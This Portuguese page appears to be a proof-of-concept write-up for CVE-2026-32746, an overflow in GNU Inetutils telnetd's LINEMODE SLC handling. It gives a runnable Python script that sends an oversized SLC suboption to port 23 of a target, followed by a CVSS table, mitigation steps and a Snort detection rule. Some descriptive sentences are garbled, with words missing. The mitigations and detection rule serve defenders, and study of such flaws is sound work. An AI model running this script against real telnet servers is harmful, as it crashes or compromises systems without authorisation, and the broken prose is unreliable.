
Prova de conceito de exploit para CVE-2026-32746, uma vulnerabilidade crítica de execução remota de código no GNU Inetutils telnetd via estouro de buffer SLC do LINEMODE. Inclui análise técnica, métricas CVSS e orientações de mitigação.
Vulnerabilidade Crítica | CVSS 9.8 | Execução Remota de Código!
Afeta: GNU Inetutils Telnetd (versões anteriores a 2.7)
Tipo: OOB Write no manipulador de subopções LINEMODE SLC
Vetor de Ataque: Rede (Porta 23) | Sem autenticação necessária
Impacto: RCE com privilégios do processo Telnetd
Foi identificado um estouro de buffer por escrita fora dos limites (OOB Write) na função add_slc do daemon do . Esta falha permite que um atacante remoto por meio da manipulação das do protocolo Telnet.
telnetdadd_slc (processamento de caracteres locais).Um atacante pode explorar esta vulnerabilidade por meio de um payload Telnet malicioso que satura o buffer interno:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload gerado para estourar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetição de 600 vezes
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso para {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregue. Verificando queda do serviço/RCE...")
⚠️ ¡AVISO! Este código é apenas para fins educacionais e de pesquisa. Seu uso em sistemas sem autorização é ilegal.
| Métrica | Valor | Descrição |
|---|---|---|
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Remoto, sem autenticação |
| Pontuação | 9.8 (CRÍTICO) 🔴 | Alto impacto na confidencialidade, integridade e disponibilidade |
| Publicação | 13 de março, 2026 | Última modificação: 5 de maio, 2026 |
✅ Atualizar o GNU Inetutils para a versão corrigida (pós-2.7).
🔹 Desabilitar o telnetd e migrar para SSH (recomendado).
🔹 Bloquear a porta 23 em firewalls de perímetro.
🔹 Configurar IDS/IPS para detectar sequências LINEMODE SLC anômalas.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)